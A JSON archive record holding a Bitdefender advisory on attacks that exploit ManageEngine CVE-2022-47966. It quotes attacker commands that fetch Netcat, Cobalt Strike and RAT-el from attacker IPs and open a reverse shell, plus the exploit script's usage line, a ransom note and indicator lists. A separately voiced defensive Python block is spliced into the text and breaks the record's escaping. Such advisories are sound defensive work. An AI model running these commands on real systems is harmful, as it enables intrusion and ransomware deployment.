{
	"id": "50b0f5d8-4334-4a6f-aefe-c4fd977687e8",
	"created_at": "2026-04-06T01:29:24.594229Z",
	"updated_at": "2026-04-10T03:25:35.798529Z",
	"deleted_at": null,
	"sha1_hash": "fddfe4b139190d30f8574b4b86a3bc0877310be5",
	"title": "Technical Advisory: Various Threat Actors Targeting ManageEngine Exploit CVE-2022-47966",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 630087,
	"plain_text": "Technical Advisory: Various Threat Actors Targeting ManageEngine Exploit CVE-2022-47966\r\nBy Martin Zugec\r\nPublished: 2023-02-23 · Archived: 2026-04-06 00:24:55 UTC\r\nStarting on January 20, 2023, Bitdefender Labs started to notice a global increase in attacks using the ManageEngine exploit CVE-2022-47966. This Remote Code Execution (RCE) vulnerability (CVSSv3 critical score 9.8) allows full takeover of the compromised system by unauthenticated threat actors. A total of 24 different products from Zoho ManageEngine are vulnerable.\r\nWe started detecting the first attacks the day after the first public Proof of Concept (PoC) was released and documented by the Horizon3.ai team. The identified victims are located across the globe and come from various industries, as is common with opportunistic attacks. Based on our analysis, 2,000 to 4,000 servers accessible from the internet are running one of the vulnerable versions. Not all of these servers are exploitable with the current PoC code, because SAML needs to be configured, but we urge all businesses running these vulnerable versions to patch immediately. After analyzing data from our telemetry, we decided to release a technical advisory to warn the public about this latest wave of opportunistic attacks.\r\nFig 1 – Geographical distribution of attacks based on our analysis\r\nAfter recent attacks targeting Microsoft Exchange or ESXi servers, this is further proof that vulnerability exploits are becoming routine for various groups of threat actors. Using data from our telemetry, we have identified different groups of threat actors, including initial access brokers, ransomware groups, and cyber espionage operators.\r\nIn this technical advisory, we describe the latest trend of opportunistic attacks, explain this particular vulnerability, and document four different clusters of attacks we have analyzed. 
We urge all ManageEngine customers to immediately locate and patch all vulnerable systems and be on high alert, as attacks are not decreasing.\r\nThe “new” winning formula for threat actors\r\nThis latest wave of attacks uses a formula similar to the one we have observed in previous large-scale global attacks.\r\n1. Threat actors identify an RCE vulnerability (preferably with a public PoC) that impacts as many companies as possible. Examples are Microsoft Exchange, Apache, or VMware ESXi. Due to the sheer scale of global deployments, even if most companies patch immediately, tens of thousands of vulnerable servers remain available even years after the patch is released.\r\n2. Using automated scanners, vulnerable systems are discovered and automatically compromised (spray-and-pray tactic).\r\n3. A malicious payload (typically a webshell to enable remote administrative access) is deployed on the compromised server.\r\nLess sophisticated attackers can automatically deploy ransomware – these are often disruptive and noisy campaigns that tend to get a lot of public attention (for example the recent ESXiArgs ransomware). However, the real danger comes from hybrid attacks that combine automated compromise with more precise execution. Threat actors can patch the vulnerability (preventing their competitors from compromising the same system), perform an assessment and decide on the best model of monetization.\r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 1 of 10\r\nFig 2 – Flow of an example hybrid attack\r\nEven if the majority of businesses patch quickly, threat actors are left with thousands of potential targets. These vulnerable servers often belong to smaller companies but can be used as a jump point for bigger and more lucrative targets. In many cases, your data (for stealing or encryption) is less valuable to threat actors than your business connections. 
When thinking of attack surface, we need to start including the whole supply chain, including small contractors and vendors. In this particular case, several products for Managed Service Providers (MSPs) are impacted, further increasing the risk of supply chain attacks that can affect multiple businesses.\r\nAnother factor that helps threat actors is that initial exploits are often derivative and behave similarly to the original PoC code with minimal modifications. This lack of initial diversity affects both offensive and defensive measures. The impact of the initial wave of attacks is mitigated, and temporary fixes and workarounds become permanent solutions. After the situation calms down, threat actors can find alternative methods for exploitation and target systems that are considered “immune.” Examples of this adaptation are the recent ProxyNotShell/OWASSRF attacks targeting Microsoft Exchange or the virtual machine escape for the OpenSLP vulnerability. VulnCheck has already documented a different payload for the CVE-2022-47966 vulnerability, with a good explanation of how the lack of diversity is becoming a significant problem when dealing with exploits.\r\nThe current state is beneficial for all types of threat actors – initial access brokers have time to establish a better foothold and offer premium services (elevated privileges or victim information such as cyberinsurance coverage…), state-sponsored and profit-sharing groups like Karakurt can exfiltrate data (read our deep dive into one of these operations), and more traditional Ransomware-as-a-Service groups can prepare debilitating attacks at a much bigger scale.\r\nConsidering all these factors, it is not surprising that our technical advisories in 2023 so far are based on vulnerabilities that were routinely exploited in 2021.\r\nManageEngine Vulnerability Overview\r\nOn January 10, 2023, ManageEngine released a security advisory for CVE-2022-47966 affecting 24 products. 
This vulnerability was initially discovered by Khoa Dinh from VCSLab (read the original research). It allows unauthenticated remote code execution due to the use of an outdated third-party dependency for XML signature validation, Apache Santuario. The vulnerability in this library was identified almost 15 years ago (March 2008).\r\nThe vulnerable library is used only when SAML SSO is or was enabled. SAML is an authentication standard that is over 20 years old, and the authentication traffic is passed through the requesting client.\r\nFig 3 – Normal SAML authentication flow\r\nModern authentication standards (like OpenID Connect with the authorization code flow) do not pass the tokens through the client; the identity provider and the service provider exchange them directly over a back channel.\r\nNormally, this should not be a concern. SAML data is in XML format, and this data is digitally signed to prevent a client from modifying it before it is passed on to the service provider. Unfortunately, with the older version of the XML signature library, reference validation is performed before signature validation.\r\nFig 4 – With the vulnerable library, references are validated before the signature validation\r\nWhen processing an XML file, threat actors can use XML transformations to execute malicious code. XML transformation is the process of changing the structure or format of an XML document to create a new XML document. The transformation is driven by a set of rules, known as an XSLT (eXtensible Stylesheet Language Transformation) stylesheet, which specifies how the source XML should be transformed into the target XML. In XML Signature, the transforms to apply are declared inside the ds:Reference element of the signed document itself, so an attacker who controls the SAML response also controls which transforms the library runs while validating that reference. Overall, XML transformation is a powerful tool that allows for the manipulation of XML data in a wide variety of ways – including execution of code. 
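The ordering problem described above (references, and with them their transforms, are processed before the signature over them is checked) is why a service provider should not let a response carrying an XSLT transform reach the signature library at all. The Python below is an added example written for this advisory, not code from Bitdefender, ManageEngine or Apache Santuario: a pre-validation gate that parses the incoming SAML response, lists every ds:Transform algorithm that is not on a small allow-list, and rejects the response before any signature verification is attempted. The two SAML responses, the allow-list and the stub signature check are constructed for the example; the XSLT stylesheet in the second sample is inert. This is a defense-in-depth check, not a substitute for the vendor patch.

```python
# Added example for this advisory, not code from Bitdefender or ManageEngine:
# a pre-validation gate for incoming SAML responses. It refuses any
# ds:Reference whose Transforms are not on a short allow-list (XSLT in
# particular) *before* the response is handed to the XML-signature library,
# which is the step that would otherwise run the transforms. The two sample
# responses below are constructed for this example; the XSLT one carries a
# harmless stylesheet, not a real payload.
import xml.etree.ElementTree as ET

DS = '{http://www.w3.org/2000/09/xmldsig#}'
XSLT_ALGORITHM = 'http://www.w3.org/TR/1999/REC-xslt-19991116'

# The only transforms a SAML service provider normally needs.
ALLOWED_TRANSFORMS = {
    'http://www.w3.org/2000/09/xmldsig#enveloped-signature',
    'http://www.w3.org/2001/10/xml-exc-c14n#',
    'http://www.w3.org/2001/10/xml-exc-c14n#WithComments',
    'http://www.w3.org/TR/2001/REC-xml-c14n-20010315',
}


def disallowed_transforms(saml_response):
    '''Return every ds:Transform Algorithm URI in the response that is not on
    the allow-list. An empty list means the response may proceed to
    signature verification. (In production, parse with defusedxml to also
    block entity-expansion tricks; the standard parser is used here only to
    keep the example dependency-free.)'''
    root = ET.fromstring(saml_response)
    bad = []
    for transform in root.iter(DS + 'Transform'):
        algorithm = transform.get('Algorithm', '')
        if algorithm not in ALLOWED_TRANSFORMS:
            bad.append(algorithm)
    return bad


def gate_saml_response(saml_response, verify_signature):
    '''Order is the point: the allow-list check runs before verify_signature,
    so a response never reaches the signature library, and therefore never
    has its transforms executed, unless every transform is allowed.
    verify_signature is the caller's real XMLDSig check; the example only
    needs it to return True or False.'''
    bad = disallowed_transforms(saml_response)
    if bad:
        return 'rejected: disallowed transform ' + ', '.join(bad)
    if not verify_signature(saml_response):
        return 'rejected: invalid signature'
    return 'accepted'


# Constructed sample: the two transforms a normal SAML response carries.
BENIGN_RESPONSE = '''<samlp:Response xmlns:samlp='urn:oasis:names:tc:SAML:2.0:protocol'
    xmlns:ds='http://www.w3.org/2000/09/xmldsig#' ID='_r1'>
  <ds:Signature><ds:SignedInfo><ds:Reference URI='#_r1'><ds:Transforms>
    <ds:Transform Algorithm='http://www.w3.org/2000/09/xmldsig#enveloped-signature'/>
    <ds:Transform Algorithm='http://www.w3.org/2001/10/xml-exc-c14n#'/>
  </ds:Transforms></ds:Reference></ds:SignedInfo>
  <ds:SignatureValue>c2lnbmF0dXJl</ds:SignatureValue></ds:Signature>
</samlp:Response>'''

# Constructed sample: same shape, but the Reference smuggles in an XSLT
# transform. The stylesheet itself is inert; what matters is that a vulnerable
# library would execute it while validating the reference, before checking
# the signature over SignedInfo.
XSLT_RESPONSE = '''<samlp:Response xmlns:samlp='urn:oasis:names:tc:SAML:2.0:protocol'
    xmlns:ds='http://www.w3.org/2000/09/xmldsig#' ID='_r1'>
  <ds:Signature><ds:SignedInfo><ds:Reference URI='#_r1'><ds:Transforms>
    <ds:Transform Algorithm='http://www.w3.org/TR/1999/REC-xslt-19991116'>
      <xsl:stylesheet xmlns:xsl='http://www.w3.org/1999/XSL/Transform' version='1.0'>
        <xsl:template match='/'><xsl:text>inert</xsl:text></xsl:template>
      </xsl:stylesheet>
    </ds:Transform>
  </ds:Transforms></ds:Reference></ds:SignedInfo>
  <ds:SignatureValue>c2lnbmF0dXJl</ds:SignatureValue></ds:Signature>
</samlp:Response>'''


if __name__ == '__main__':
    # A stub that accepts everything stands in for the real signature check,
    # to show that the XSLT response is stopped before it is ever consulted.
    print(gate_saml_response(BENIGN_RESPONSE, lambda r: True))
    print(gate_saml_response(XSLT_RESPONSE, lambda r: True))
```

Current versions of Apache Santuario expose a secure-validation mode that rejects XSLT transforms; the gate above applies the same idea one layer earlier and independently of the library version, which is useful when the dependency is bundled inside a product (as it is in ManageEngine) and cannot be upgraded on the operator's own schedule.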
\r\nBefore the service provider can validate the signature and detect that the SAML response has been modified, the code has already executed on the compromised server. This code runs under the process \u003cinstall directory\u003e\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe.\r\nClusters of Attacks\r\nIn all analyzed cases, the aim of the attacks was to deploy tools such as Netcat, Cobalt Strike beacon, RAT-el (an open-source penetration testing tool) and others on unpatched systems, using built-in tools like certutil.exe, bitsadmin.exe, powershell.exe, or curl.exe.\r\nAmong the cases, we have identified four main clusters of attack types; details are provided in the sections below. Aside from these four clusters, we have identified a wide range of attacks that could not be clustered.\r\nCluster 1 – Initial Access Brokers\r\nAfter initial compromise, the attack continued with the following commands:\r\nCommand Lines\r\ncertutil.exe -urlcache -f http://80.85.156[.]184:8085/cn.exe C:\\cn.exe\r\npowershell C:\\cn.exe -e cmd.exe 80.85.156[.]184 443\r\ncn.exe was identified as Netcat, a command-line networking tool that is often used as a backdoor. Further analyzing our telemetry, we have identified the following files hosted on the same IP address and port. 
\r\nFile Name | MD5 Hash | Description\r\nAnyDesk.exe | 9a1d9fe9b1223273c314632d04008384 | Legitimate AnyDesk installer\r\ncf.exe | b777226ef93acdb168980bbca82a48fe | DarkComet communicating with 80.85.156[.]184:1456\r\ncg.exe | 8da896375e5d33e7d7486dbf71d008d8 | DarkComet communicating with 80.85.154[.]180:1456\r\ncl.exe | 5c0227204548c5a768c2e11da02ff774 | DarkComet communicating with 80.85.154[.]180:1456\r\ncn.exe | e0fb946c00b140693e3cf5de258c22a1 | Netcat\r\nCVE-2022-47966.py | 6e3b1169aac82b4d0e8ea0a24d1477d5 | PoC from Horizon3.ai\r\ngo.bat | e2c644343fad304ccde047f3301066ba |\r\nrdp.ps1 | 9758c592ef4b9a2279f8e80e992248b6 | Enable RDP on port 8094\r\nreverse.elf | 199cb4936f7ef64fa134eb3cefff0518 | Reverse shell communicating with 80.85.156[.]184\r\nreverse.exe | 988038d8407d510c905183b8f6c421d6 | Reverse shell communicating with 80.85.156[.]184\r\nreverse_bind.exe | edac597788e7c3df14a5fdcd13ee8916 |\r\nThe threat actors used multiple scripts to automate their operation. These scripts (ip\u003cnumber\u003e.sh) used the following syntax to test whether a target is vulnerable to CVE-2022-47966:\r\nCommand Lines\r\npython CVE-2022-47966.py --url https://\u003ctarget ip address\u003e:443/SamlResponseServlet --command 'powershell echo ASDFGH \u003e C:\\Progra~1\\ManageEngine\\ServiceDesk\\webapps\\ROOT\\images\\a.txt'\r\npython CVE-2022-47966.py --url https://\u003ctarget ip address\u003e:8181/SamlResponseServlet --command 'powershell echo ASDFGH \u003e C:\\Progra~1\\ManageEngine\\ServiceDesk\\webapps\\ROOT\\images\\a.txt'\r\nThe aim of these attacks was to install AnyDesk software for remote access.\r\nCluster 2 – Buhti Ransomware\r\nThe threat actors attempted to download any.bat to install AnyDesk software and tried to execute a ransomware payload for Buhti Ransomware. 
This is a new ransomware family – while we have seen previous reports of Linux ransomware written in Go, our sample was a Windows PE executable (MD5 383b0d0dda2d7557b5cca518f53256b9).\r\nThis ransomware sample is currently detected under the name ATI:Ransom.Buhti.389227C4. We have extracted the following ransom note from the encryptor:\r\n----------- [ Welcome to buhtiRansom ] -------------\u003e\r\n\r\nWhat happend?\r\n----------------------------------------------\r\nYour files are encrypted. We use strong encryption algorithms, so you cannot decrypt your data.\r\nBut you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your files.\r\nFollow our instructions below and you will recover all your data.\r\n\r\nWhat guarantees?\r\n----------------------------------------------\r\nWe value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.\r\nAll our decryption software is perfectly tested and will decrypt your data.\r\n\r\nHow to get access?\r\n----------------------------------------------\r\nUsing a browser:\r\n1) Open website: https://satoshidisk[.]com/pay/CHTWpW\r\n2) Enter valid email to receive download link after payment.\r\n3) Pay amount to Bitcoin address.\r\n4) Receive email link to the download page.\r\n5) Decrypt instruction included.\r\n\r\n!!! DANGER !!!\r\nDO NOT MODIFY or try to RECOVER any files yourself. It WILL NOT be able to RESTORE.\r\n!!! DANGER !!!\r\nFig 5 – Screenshot of the payment site used by Buhti ransomware\r\nCluster 3 – Cobalt Strike and RAT-el\r\nThreat actors tried to download malicious software using the bitsadmin.exe and curl.exe tools from the server 212.192.246[.]232. 
The analysis of the hosted files shows that the Cobalt Strike and RAT-el red teaming tools were intended to be deployed.\r\nCommand Line | MD5 | Description | Detection Name\r\n\"bitsadmin /transfer admin3 /download /priority high http://212.192.246[.]232/home/svchost.ps1 C:\\users\\public\\music\\svchost.ps1\" | e3cff253b9ad9050eb57d957624b796e | Cobalt Strike beacon with C2 0xx1.kaspenskyupdates[.]com | Heur.BZC.Leop\r\nbitsadmin /transfer admin3 /download /priority high http://212.192.246[.]232/temp/conhost.exe C:\\users\\public\\music\\conhost.exe | 53deb494057bb8e5d72b0f53bab1cb44 | RAT-el communicating with C2 135.181.121[.]232 | Heur.BZC.Leop\r\ncurl http://212.192.246[.]232/temp/conhost.exe -o c:\\windows\\temp\\conhost.exe | 53deb494057bb8e5d72b0f53bab1cb44 | Same RAT-el sample (identical MD5) | Generic.Backd\r\nCluster 4 – Cyber espionage\r\nOne cluster included evidence of a targeted espionage operation – we decided to write a separate, more detailed report about this operation. You can read more about it in the Weaponizing PoCs – A targeted attack using CVE-2022-47966 research from Bitdefender Labs.\r\nConclusion \u0026 Recommendations\r\nThis vulnerability is another clear reminder of the importance of keeping systems up to date with the latest security patches while also employing strong perimeter defense. Attackers don't need to scour for new exploits or novel techniques when they know that many organizations are vulnerable to older exploits due, in part, to the lack of proper patch management and risk management.\r\nIn addition to prevention and cyber hygiene, multi-layered protection on all endpoints, servers, and workloads is critical. 
In our telemetry, we have identified the indicators of compromise listed at the end of this advisory, detected by different endpoint security modules.\r\nImplementing IP, domain, and URL reputation is one of the most effective methods of defeating automated vulnerability exploits. According to analysis in the Data Breach Investigations Report 2022, only 0.4% of the IPs that attempted RCE were not seen in a previous attack. Blocking bad IPs, domains, or URLs on all devices, including remote and work-from-home endpoints, can be highly effective.\r\nFinally, companies of all sizes should implement detection and response capabilities to detect any suspicious activity on the network and minimize the dwell time of adversaries. The GravityZone XDR sensors detect suspicious activity on the server or virtual machine, and alert security teams to lateral movement attempts or the establishment of an external connection by the threat actor. This technology can be augmented by good security operations, either in-house or through a managed service like Bitdefender MDR.\r\nUltimately, it is important to keep in mind that the best protection against modern cyber-attacks is a multi-layered defense-in-depth architecture. Bitdefender GravityZone covers this by delivering prevention, protection, and detection and response in a single solution.\r\nWe would like to thank Victor Vrabie, Cristina Vatamanu, and Alexandru Maximciuc for help with putting this advisory report together.\r\nIndicators of Compromise\r\nAn up-to-date and complete list of indicators of compromise is available to Bitdefender Threat Intelligence users. The currently known indicators of compromise are listed below. 
\r\nURLs\r\nhttp://80.85.156[.]184:8085/cn.exe\r\nhttps://tmpfiles[.]org/dl/788858/any.txt\r\nhttps://tmpfiles[.]org/dl/765036/enc.txt\r\nhttp://212.192.246[.]232/home/svchost.ps1\r\nhttp://212.192.246[.]232/temp/conhost.exe\r\nhttp://111.68.7[.]122:8081/svhost.exe\r\nhttp://146.70.126[.]178:57228/shell.exe\r\nhttp://185.163.45[.]86:8000/1.txt\r\nhttp://79.141.162[.]36:8888/aaaa.txt\r\nhttp://143.244.153[.]229:8090\r\nhttp://160.20.147[.]145:8000/favicon.ico\r\nhttp://104.223.35[.]221/dashboard.html\r\nhttp://146.4.21[.]94/tmp/tmp/logs.php\r\nhttp://146.4.21[.]94/tmp/tmp/comp.dat\r\nhttp://45.146.7[.]20:8000/nc.exe\r\nhttp://149.28.57[.]130:443/Import.reg\r\nhttp://149.28.57[.]130:443/time.bat\r\nhttp://149.28.57[.]130:443/bdredline\r\nhttp://45.154.14[.]194:443/conhost.txt\r\nhttp://45.154.14[.]194:443/K7AVWScn.exe\r\nhttp://45.154.14[.]194:443/conhost.exe\r\nhttp://45.154.14[.]194:8080/conhost.exe\r\nhttp://45.154.14[.]194:443/K7AVWScn.pfx\r\nhttp://45.154.14[.]194:443/K7AVWScn.dll\r\nhttp://45.154.14[.]194:443/K7AVWScn.txt\r\nhttp://45.154.14[.]194:443/msftedit.dll\r\nhttp://45.154.14[.]194:443/OLE.PDB\r\nhttp://45.154.14[.]194:443/cmd.txt\r\nhttp://45.154.14[.]194:443/MainFilterInitializer.jar\r\nhttp://45.154.14[.]194:443/Import.reg\r\nhttp://45.154.14[.]194:443/time.bat\r\nFiles\r\nb777226ef93acdb168980bbca82a48fe\r\n8da896375e5d33e7d7486dbf71d008d8\r\n5c0227204548c5a768c2e11da02ff774\r\ne0fb946c00b140693e3cf5de258c22a1\r\n9758c592ef4b9a2279f8e80e992248b6\r\n199cb4936f7ef64fa134eb3cefff0518\r\n988038d8407d510c905183b8f6c421d6\r\nedac597788e7c3df14a5fdcd13ee8916\r\n383b0d0dda2d7557b5cca518f53256b9\r\ne3cff253b9ad9050eb57d957624b796e\r\n53deb494057bb8e5d72b0f53bab1cb44\r\n527c71c523d275c8367b67bbebf48e9f 
\r\n61e82cae3c97887e4b367e507c4995ed\r\nc027d641c4c1e9d9ad048cda2af85db6\r\n4960591cc04b080827020393f21c405b\r\nbfe79b11ee1b82ae95b14fd53b6c3fd3\r\nIP Addresses\r\n45.154.14[.]194\r\n149.28.57[.]130\r\n78.141.247[.]105\r\n80.85.156[.]184\r\n135.181.121[.]232\r\n45.146.7[.]20\r\n5.255.107[.]19\r\n139.99.118[.]61\r\n212.192.246[.]232\r\n111.68.7[.]122\r\n146.70.126[.]178\r\n185.163.45[.]86\r\n79.141.162[.]36\r\n143.244.153[.]229\r\n160.20.147[.]145\r\n104.223.35[.]221\r\n146.4.21[.]94\r\nDomains\r\n0xx1.kaspenskyupdates[.]com\r\nicy51j1b6sbewpauivxwfrmcu30vok.oastify[.]com\r\nSource: https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966"
	],
	"report_names": [
		"tech-advisory-manageengine-cve-2022-47966"
	],
	"threat_actors": [
		{
			"id": "6ad410c7-e291-4327-a54b-281c23f0d4fa",
			"created_at": "2022-10-25T16:07:24.501468Z",
			"updated_at": "2026-04-10T02:00:05.013427Z",
			"deleted_at": null,
			"main_name": "Karakurt",
			"aliases": [
				"Mushy Scorpius"
			],
			"source_name": "ETDA:Karakurt",
			"tools": [
				"7-Zip",
				"Agentemis",
				"AnyDesk",
				"Cobalt Strike",
				"CobaltStrike",
				"FileZilla",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"WinZip",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2af9bea3-b43e-4a6d-8dc6-46dad6e3ff24",
			"created_at": "2022-10-25T16:47:55.853415Z",
			"updated_at": "2026-04-10T02:00:03.856263Z",
			"deleted_at": null,
			"main_name": "GOLD TOMAHAWK",
			"aliases": [
				"Karakurt",
				"Karakurt Lair",
				"Karakurt Team"
			],
			"source_name": "Secureworks:GOLD TOMAHAWK",
			"tools": [
				"7-Zip",
				"AnyDesk",
				"Mega",
				"QuickPacket",
				"Rclone",
				"SendGB"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "079e3d6e-24ef-42b0-b555-75c288f9efd8",
			"created_at": "2023-03-04T02:01:54.105946Z",
			"updated_at": "2026-04-10T02:00:03.359009Z",
			"deleted_at": null,
			"main_name": "Karakurt",
			"aliases": [
				"Karakurt Lair"
			],
			"source_name": "MISPGALAXY:Karakurt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775438964,
	"ts_updated_at": 1775791535,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fddfe4b139190d30f8574b4b86a3bc0877310be5.pdf",
		"text": "https://archive.orkl.eu/fddfe4b139190d30f8574b4b86a3bc0877310be5.txt",
		"img": "https://archive.orkl.eu/fddfe4b139190d30f8574b4b86a3bc0877310be5.jpg"
	}
}